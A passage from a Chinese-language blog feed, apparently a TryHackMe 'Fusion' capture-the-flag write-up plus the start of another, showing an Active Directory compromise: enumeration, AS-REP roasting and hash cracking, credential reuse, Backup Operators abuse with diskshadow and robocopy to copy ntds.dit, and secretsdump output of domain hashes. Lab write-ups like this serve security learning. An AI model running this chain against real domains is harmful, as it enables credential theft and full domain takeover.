3269/tcp open  tcpwrapped    syn-ack ttl 128
3389/tcp open  ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services
|_ssl-date: 2026-09-09T12:48:56+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Issuer: commonName=Fusion-DC.fusion.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-08T12:44:36
| Not valid after:  2027-03-10T12:44:36
| MD5:   ac17:2de3:e42b:ac9a:2a98:7800:9b3b:60a8
| SHA-1: 9bf7:fd97:2be2:9a1b:4adc:e2e1:21af:023b:037e:2e59
| -----BEGIN CERTIFICATE-----
| MIIC7jCCAdagAwIBAgIQURQCtsQiX5dIRlFO2/uk5jANBgkqhkiG9w0BAQsFADAg
| MR4wHAYDVQQDExVGdXNpb24tREMuZnVzaW9uLmNvcnAwHhcNMjYwOTA4MTI0NDM2
| WhcNMjcwMzEwMTI0NDM2WjAgMR4wHAYDVQQDExVGdXNpb24tREMuZnVzaW9uLmNv
| cnAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCa1OgP4Hjbfk7vBwqi
| 5ZAy/ofrXjTYN3AFcZBkRI4Y69dXoVOrYGqs+nSk+0kbPm7hOPCcciOspd7oM5xS
| lJcNizVWaPgPg6jzhl03jlQmtujHHsz+xlyqDg/AVyfiy+A2nYEg3DNYJmuXRx30
| kjXWhnOK/1STq2dsb6vlsq72AR/gxbdx0i6fCj8uTNmt4LEUP95VSsAJfkkbkP/U
| R6vHkE238UcZgdcYV7egPBTjHh/alOw3evGuzApzmIiKqHUNyw9tQ3yx64uzOGDC
| NL/8gbcGVhkRojylfrrWk/5OE4nce4CDd3w/uTESAKItsM4Enu62WfuwqoPoLvGV
| h2eFAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDAN
| BgkqhkiG9w0BAQsFAAOCAQEAUGsFertZvhZTUXF3z/QypEc7H6aY2ESyGmTg8f8E
| 1XU3vB32Y69ajI0fnrvIVhVIZcL52hc8bXj47mN2/TJmQ5fbYSSGXA2fEJ22R/t1
| 5d8Dq9+Zw5AY4Fe/B90xtjr6/dS1Cl5dmmeh0GOHsYaQSkl+nnDq8xfo7RAq7Xcm
| ELaGpaOObsI/LGqOj5UoVrpNyUziMKMtG+MUBmvAnhBH+ly2oTzelhEnijNeEgc4
| SaXrB5IfODLQSe/FAG2iSHGKExxhy3rgirJr0excphPVkxTBY+FeI2tgBkYJRCJv
| P5FOt1Mcn98ezT0+ZqxjTM7Pmq1khJO1uHsPGHa9fnVpkw==
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: FUSION
|   NetBIOS_Domain_Name: FUSION
|   NetBIOS_Computer_Name: FUSION-DC
|   DNS_Domain_Name: fusion.corp
|   DNS_Computer_Name: Fusion-DC.fusion.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2026-09-09T12:48:17+00:00
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
</code></pre>
<p>标准的 DC, 但开放有 web 页面. TTL 均为 128, 符合 windows 一跳后预期</p>
<ol>
<li>域名: <code>fusion.corp</code></li>
<li>主机名: <code>Fusion-DC.fusion.corp</code></li>
</ol>
<p>以上 NMAP 结果并没有给出 <code>5985</code> 即 winrm 开放, 但其实际上是开放的:</p>
<pre><code>nmap -p5985 fusion.corp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-09-09 13:39 UTC
Nmap scan report for fusion.corp (10.67.134.232)
Host is up (0.00051s latency).
rDNS record for 10.67.134.232: Fusion-DC.fusion.corp

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
</code></pre>
<h2>smb</h2>
<p>尝试 guest 登陆, 需要一组有效的凭据</p>
<pre><code>nxc smb fusion.corp -u guest -p ''
SMB         10.67.134.232   445    FUSION-DC        [*] Windows 10 / Server 2019 Build 17763 x64 (name:FUSION-DC) (domain:fusion.corp) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.67.134.232   445    FUSION-DC        [-] fusion.corp\guest: STATUS_ACCOUNT_DISABLED
nxc smb fusion.corp  -u 'absolutenotausername' -p ''
SMB         10.67.134.232   445    FUSION-DC        [*] Windows 10 / Server 2019 Build 17763 x64 (name:FUSION-DC) (domain:fusion.corp) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.67.134.232   445    FUSION-DC        [-] fusion.corp\absolutenotausername: STATUS_LOGON_FAILURE 
</code></pre>
<h2>ldap</h2>
<pre><code>ldapsearch -x -H ldap://10.67.134.232 -s base
# extended LDIF
#
# LDAPv3
# base &lt;&gt; (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=fusion,DC=corp
ldapServiceName: fusion.corp:fusion-dc$@FUSION.CORP
...
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=fusion,DC=corp
serverName: CN=FUSION-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Con
 figuration,DC=fusion,DC=corp
schemaNamingContext: CN=Schema,CN=Configuration,DC=fusion,DC=corp
namingContexts: DC=fusion,DC=corp
namingContexts: CN=Configuration,DC=fusion,DC=corp
namingContexts: CN=Schema,CN=Configuration,DC=fusion,DC=corp
namingContexts: DC=DomainDnsZones,DC=fusion,DC=corp
namingContexts: DC=ForestDnsZones,DC=fusion,DC=corp
isSynchronized: TRUE
highestCommittedUSN: 69677
dsServiceName: CN=NTDS Settings,CN=FUSION-DC,CN=Servers,CN=Default-First-Site-
 Name,CN=Sites,CN=Configuration,DC=fusion,DC=corp
dnsHostName: Fusion-DC.fusion.corp
defaultNamingContext: DC=fusion,DC=corp
currentTime: 20260909130613.0Z
configurationNamingContext: CN=Configuration,DC=fusion,DC=corp
</code></pre>
<p>可以空绑定, 但进一步查询需要权限:</p>
<pre><code>ldapsearch -x -H ldap://10.67.134.232 -b 'DC=fusion,DC=corp' "(objectClass=user)" sAMAccountName
# extended LDIF
#
# LDAPv3
# base &lt;DC=fusion,DC=corp&gt; with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName 
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
</code></pre>
<h1>web</h1>
<p><img src="./web-main.png" alt="web" />
一家商业公司</p>
<h2>tech stack</h2>
<pre><code>HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 25 Oct 2018 06:08:00 GMT
Accept-Ranges: bytes
ETag: "0e0db14296cd41:0"
Server: Microsoft-IIS/10.0
Date: Wed, 09 Sep 2026 12:58:12 GMT
Content-Length: 53888
</code></pre>
<p>标准 IIS, 没什么有趣的信息</p>
<h2>leak</h2>
<p>目录扫描给出了一个目录: <code>backup</code></p>
<pre><code>dirsearch -u http://10.67.134.232

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/wrk/reports/http_10.67.134.232/_26-09-09_13-03-07.txt

Target: http://10.67.134.232/

[13:03:07] Starting: 
[13:03:07] 301 -  147B  - /js  -&gt;  http://10.67.134.232/js/
[13:03:07] 403 -  312B  - /%2e%2e//google.com
[13:03:07] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[13:03:20] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[13:03:42] 301 -  151B  - /backup  -&gt;  http://10.67.134.232/backup/
[13:03:42] 200 -  265B  - /Backup/
[13:03:42] 200 -  265B  - /backup/
[13:03:45] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[13:03:50] 301 -  148B  - /css  -&gt;  http://10.67.134.232/css/
[13:04:03] 301 -  148B  - /img  -&gt;  http://10.67.134.232/img/
[13:04:07] 200 -  241B  - /js/
[13:04:08] 301 -  148B  - /lib  -&gt;  http://10.67.134.232/lib/
[13:04:08] 200 -    1KB - /lib/
</code></pre>
<p>其中有一个<code>.ods</code>文件:
<img src="./web-backup.png" alt="leak" /></p>
<p>打开后有多个用户名, 命名规则为: 名首字母+姓
<img src="./ods.png" alt="ods" /></p>
<p>提取出来:</p>
<pre><code>jmickel
aarnold
llinda
jpowel
dvroslav
tjefferson
nmaurin
mladovic
lparker
kgarland
dpertersen
</code></pre>
<h1>asrep-roasting</h1>
<p>通过 kerberos 测试用户的同时尝试 asrep-roasting</p>
<pre><code>GetNPUsers.py -usersfile ./users -request -format hashcat -no-pass fusion.corp/
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$lparker@FUSION.CORP:85dcea57e67f9c393823931c2b4603e3$468f20f9b451bb54b17be8a5888ac4a2acc55d66389d14c1d56db9d52488230dc39c1b8656d5b22c6eb996c0ed510116f86788eb47623f782651107917cfadd2550d432a02b85d63fe0e26b72cfafffcfc0519315afcea363ea4b9970945963a811d14c0df7256bc2e7410a34c920e7da7119376c30647afff4d58a869086a84cc5fe92eb7226d3801a683c43ac402d706cfb7b94c493f64241b6d86a62d3898de95e864f1240757005da2ca5e35ad30a5dc7b3743197a9c6d69459f8bb3315bcb944e224b2fb1714fa1574b83d286b49845baae3f2c8af4511663c55f1593f0366ae8f18e8e37bf3890
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
</code></pre>
<p>只有一个用户名有效: <code>lparker</code>, 尝试破解哈希:</p>
<pre><code>$krb5asrep$23$lparker@FUSION.CORP:85dcea57e67f9c393823931c2b4603e3$468f20f9b451bb54b17be8a5888ac4a2acc55d66389d14c1d56db9d52488230dc39c1b8656d5b22c6eb996c0ed510116f86788eb47623f782651107917cfadd2550d432a02b85d63fe0e26b72cfafffcfc0519315afcea363ea4b9970945963a811d14c0df7256bc2e7410a34c920e7da7119376c30647afff4d58a869086a84cc5fe92eb7226d3801a683c43ac402d706cfb7b94c493f64241b6d86a62d3898de95e864f1240757005da2ca5e35ad30a5dc7b3743197a9c6d69459f8bb3315bcb944e224b2fb1714fa1574b83d286b49845baae3f2c8af4511663c55f1593f0366ae8f18e8e37bf3890:!!abbylvzsvs2k6!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$lparker@FUSION.CORP:85dcea57e67f9c393...bf3890
Time.Started.....: Wed Sep  9 21:44:31 2026 (0 secs)
Time.Estimated...: Wed Sep  9 21:44:31 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/opt/seclists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 15500.6 kH/s (0.61ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2490368/14344384 (17.36%)
Rejected.........: 0/2490368 (0.00%)
Restore.Point....: 1867776/14344384 (13.02%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: demidoodles -&gt; zoeemma2007
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#02.: Util: 81% Pwr:308mW

Started: Wed Sep  9 21:44:28 2026
Stopped: Wed Sep  9 21:44:32 2026
</code></pre>
<p>得到凭据: <code>lparker</code>:<code>!!abbylvzsvs2k6!</code></p>
<h1>act as lparker</h1>
<pre><code>nxc smb fusion.corp -u lparker -p '!!abbylvzsvs2k6!' --shares
SMB         10.67.153.249   445    FUSION-DC        [*] Windows 10 / Server 2019 Build 17763 x64 (name:FUSION-DC) (domain:fusion.corp) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.67.153.249   445    FUSION-DC        [+] fusion.corp\lparker:!!abbylvzsvs2k6! 
SMB         10.67.153.249   445    FUSION-DC        [*] Enumerated shares
SMB         10.67.153.249   445    FUSION-DC        Share           Permissions     Remark
SMB         10.67.153.249   445    FUSION-DC        -----           -----------     ------
SMB         10.67.153.249   445    FUSION-DC        ADMIN$                          Remote Admin
SMB         10.67.153.249   445    FUSION-DC        C$                              Default share
SMB         10.67.153.249   445    FUSION-DC        IPC$            READ            Remote IPC
SMB         10.67.153.249   445    FUSION-DC        NETLOGON        READ            Logon server share 
SMB         10.67.153.249   445    FUSION-DC        SYSVOL          READ            Logon server share 
</code></pre>
<p>重新进行枚举, 没什么有趣的共享, 查看用户:</p>
<pre><code>nxc smb fusion.corp -u lparker -p '!!abbylvzsvs2k6!' --users 
SMB         10.67.153.249   445    FUSION-DC        [*] Windows 10 / Server 2019 Build 17763 x64 (name:FUSION-DC) (domain:fusion.corp) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.67.153.249   445    FUSION-DC        [+] fusion.corp\lparker:!!abbylvzsvs2k6! 
SMB         10.67.153.249   445    FUSION-DC        -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.67.153.249   445    FUSION-DC        Administrator                 2021-03-04 16:13:07 0       Built-in account for administering the computer/domain 
SMB         10.67.153.249   445    FUSION-DC        Guest                         &lt;never&gt;             0       Built-in account for guest access to the computer/domain 
SMB         10.67.153.249   445    FUSION-DC        krbtgt                        2021-03-03 12:43:43 0       Key Distribution Center Service Account 
SMB         10.67.153.249   445    FUSION-DC        lparker                       2021-03-03 13:37:40 0        
SMB         10.67.153.249   445    FUSION-DC        jmurphy                       2021-03-03 13:41:24 0       Password set to u8WC3!kLsgw=#bRY
</code></pre>
<p>除去 Administrator 共两个用户, 根据描述得到另一组凭据: <code>jmurphy</code>:<code>u8WC3!kLsgw=#bRY</code></p>
<h1>act as jmurphy</h1>
<pre><code>nxc winrm fusion.corp -u jmurphy -p 'u8WC3!kLsgw=#bRY' 
WINRM       10.67.153.249   5985   FUSION-DC        [*] Windows 10 / Server 2019 Build 17763 (name:FUSION-DC) (domain:fusion.corp) 
WINRM       10.67.153.249   5985   FUSION-DC        [+] fusion.corp\jmurphy:u8WC3!kLsgw=#bRY (Pwn3d!)

bloodyAD -d fusion.corp -u 'jmurphy' -p 'u8WC3!kLsgw=#bRY' --dc-ip 10.67.153.249 --host fusion.corp  get  membership jmurphy

distinguishedName: CN=Users,CN=Builtin,DC=fusion,DC=corp
objectSid: S-1-5-32-545
sAMAccountName: Users

distinguishedName: CN=Backup Operators,CN=Builtin,DC=fusion,DC=corp
objectSid: S-1-5-32-551
sAMAccountName: Backup Operators

distinguishedName: CN=Remote Management Users,CN=Builtin,DC=fusion,DC=corp
objectSid: S-1-5-32-580
sAMAccountName: Remote Management Users

distinguishedName: CN=Domain Users,CN=Users,DC=fusion,DC=corp
objectSid: S-1-5-21-1898838421-3672757654-990739655-513
sAMAccountName: Domain Users
</code></pre>
<p>有趣的是, 除了 <code>Remote Management Users</code>, 用户 jmurphy 属于 <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#backup-operators">Backup Operators</a> 组</p>
<h2>shell as jmurphy</h2>
<pre><code>*Evil-WinRM* PS C:\Users\jmurphy\Documents&gt; whoami /all

USER INFORMATION
----------------

User Name      SID
============== =============================================
fusion\jmurphy S-1-5-21-1898838421-3672757654-990739655-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
</code></pre>
<h2>SeBackupPrivilege</h2>
<h3>SAM dump</h3>
<p>复制 SAM 和 SYSTEM, 传输到本地破解:</p>
<pre><code>*Evil-WinRM* PS C:\Users\jmurphy\Documents&gt; reg save HKLM\sam .\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\jmurphy\Documents&gt; reg save HKLM\system .\system
The operation completed successfully.
</code></pre>
<pre><code>secretsdump.py -sam ./sam -system ./system LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xeafd8ccae4277851fc8684b967747318
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2182eed0101516d0a206b98c579565e6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
</code></pre>
<p>但实际上无法使用该 hash 进行认证, 原因很简单: <strong>SAM 存储的是机器本地的账户数据, 对于 AD 数据我们需要 NTDS.dit</strong></p>
<h3>NTDS.dit</h3>
<pre><code>set context persistent nowriters
set metadata c:\Users\jmurphy\temp\metadata.cab
add volume c: alias trophy
create
expose %trophy% x:
</code></pre>
<p>一个方法为使用卷影拷贝:</p>
<pre><code>PS C:\Users\jmurphy&gt; diskshadow /s sd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  FUSION-DC,  9/9/2026 8:01:51 AM

-&gt; set context persistent nowriters
-&gt; set metadata c:\Users\jmurphy\temp\metadata.cab
-&gt; add volume c: alias trophy
-&gt; create
Alias trophy for shadow ID {083c2c5c-4104-40bc-a4a1-cb213446267a} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {f3986584-bbcb-4512-ba3a-e10096caa75c} set as environment variable.

Querying all shadow copies with the shadow copy set ID {f3986584-bbcb-4512-ba3a-e10096caa75c}

	* Shadow copy ID = {083c2c5c-4104-40bc-a4a1-cb213446267a}		%trophy%
		- Shadow copy set: {f3986584-bbcb-4512-ba3a-e10096caa75c}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{66a659a9-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 9/9/2026 8:01:54 AM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: Fusion-DC.fusion.corp
		- Service machine: Fusion-DC.fusion.corp
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-&gt; expose %trophy% x:
-&gt; %trophy% = {083c2c5c-4104-40bc-a4a1-cb213446267a}
The shadow copy was successfully exposed as x:\.
-&gt;

robocopy /b x:\windows\ntds . ntds.dit
------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:01   0:00:01                       0:00:00   0:00:00


   Speed :            11297788 Bytes/sec.
   Speed :             646.464 MegaBytes/min.
   Ended : Wednesday, September 9, 2026 8:02:23 AM
</code></pre>
<p>Let's go dump!</p>
<pre><code>secretsdump.py -system ./system -ntds ./ntds.dit LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xeafd8ccae4277851fc8684b967747318
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 76cf6bbf02e743fac12666e5a41342a7
[*] Reading and decrypting hashes from ./ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9653b02d945329c7270525c4c2a69c67:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FUSION-DC$:1000:aad3b435b51404eeaad3b435b51404ee:06dad9b238c644fdc20c7633b82a72c6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:feabe44b40ad2341cdef1fd95297ef38:::
fusion.corp\lparker:1103:aad3b435b51404eeaad3b435b51404ee:5a2ed7b4bb2cd206cc884319b97b6ce8:::
fusion.corp\jmurphy:1104:aad3b435b51404eeaad3b435b51404ee:69c62e471cf61441bb80c5af410a17a3:::
[*] Kerberos keys from ./ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:4db79e601e451bea7bb01d0a8a1b5d2950992b3d2e3e750ab1f3c93f2110a2e1
Administrator:aes128-cts-hmac-sha1-96:c0006e6cbd625c775cb9971c711d6ea8
Administrator:des-cbc-md5:d64f8c131997a42a
FUSION-DC$:aes256-cts-hmac-sha1-96:3512e0b58927d24c67b6d64f3d1b71e392b7d3465ae8e9a9bc21158e53a75088
FUSION-DC$:aes128-cts-hmac-sha1-96:70a93c812e563eb869ba00bcd892f76a
FUSION-DC$:des-cbc-md5:04b9ef07d9e0a279
krbtgt:aes256-cts-hmac-sha1-96:82e655601984d4d9d3fee50c9809c3a953a584a5949c6e82e5626340df2371ad
krbtgt:aes128-cts-hmac-sha1-96:63bf9a2734e81f83ed6ccb1a8982882c
krbtgt:des-cbc-md5:167a91b383cb104a
fusion.corp\lparker:aes256-cts-hmac-sha1-96:4c3daa8ed0c9f262289be9af7e35aeefe0f1e63458685c0130ef551b9a45e19a
fusion.corp\lparker:aes128-cts-hmac-sha1-96:4e918d7516a7fb9d17824f21a662a9dd
fusion.corp\lparker:des-cbc-md5:7c154cb3bf46d904
fusion.corp\jmurphy:aes256-cts-hmac-sha1-96:7f08daa9702156b2ad2438c272f73457f1dadfcb3837ab6a92d90b409d6f3150
fusion.corp\jmurphy:aes128-cts-hmac-sha1-96:c757288dab94bf7d0d26e88b7a16b3f0
fusion.corp\jmurphy:des-cbc-md5:5e64c22554988937
</code></pre>
<h1>shell as Administrator</h1>
<pre><code>PS C:\Users\Administrator\Desktop&gt; whoami /all

USER INFORMATION
----------------

User Name            SID
==================== ============================================
fusion\administrator S-1-5-21-1898838421-3672757654-990739655-500


GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                          Attributes
============================================= ================ ============================================ ===============================================================
Everyone                                      Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                 Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
FUSION\Domain Admins                          Group            S-1-5-21-1898838421-3672757654-990739655-512 Mandatory group, Enabled by default, Enabled group
FUSION\Group Policy Creator Owners            Group            S-1-5-21-1898838421-3672757654-990739655-520 Mandatory group, Enabled by default, Enabled group
FUSION\Schema Admins                          Group            S-1-5-21-1898838421-3672757654-990739655-518 Mandatory group, Enabled by default, Enabled group
FUSION\Enterprise Admins                      Group            S-1-5-21-1898838421-3672757654-990739655-519 Mandatory group, Enabled by default, Enabled group
FUSION\Denied RODC Password Replication Group Alias            S-1-5-21-1898838421-3672757654-990739655-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level          Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


PS C:\Users\Administrator\Desktop&gt; ipconfig

Windows IP Configuration

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : ec2.internal
   Link-local IPv6 Address . . . . . : fe80::985e:63d:c0fa:2957%4
   IPv4 Address. . . . . . . . . . . : 10.67.153.186
   Subnet Mask . . . . . . . . . . . : 255.255.192.0
   Default Gateway . . . . . . . . . : 10.67.128.1
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="THM-writeup"/>
  </entry>
  <entry>
    <title>ledger-thm</title>
    <link href="https://0x5t4ckc47.github.io/posts/ledger-thm/ledger/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/ledger-thm/ledger/</id>
    <published>2026-09-08T00:00:00.000Z</published>
    <updated>2026-09-08T00:00:00.000Z</updated>
    <summary>看素晴去了</summary>
    <content type="html"><![CDATA[<h1>recon</h1>
<p>:::note
打该 box 时进行了多次重启, 因此有不同的 IP
:::
nmap 结果如下:</p>
<pre><code>PORT      STATE  SERVICE       REASON          VERSION
53/tcp    open   domain        syn-ack ttl 128 Simple DNS Plus
80/tcp    open   http          syn-ack ttl 128 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open   kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2026-09-08 11:08:35Z)
135/tcp   open   msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open   netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp   open   ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:labyrinth.thm.local
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-08T10:52:06
| Not valid after:  2027-09-08T10:52:06
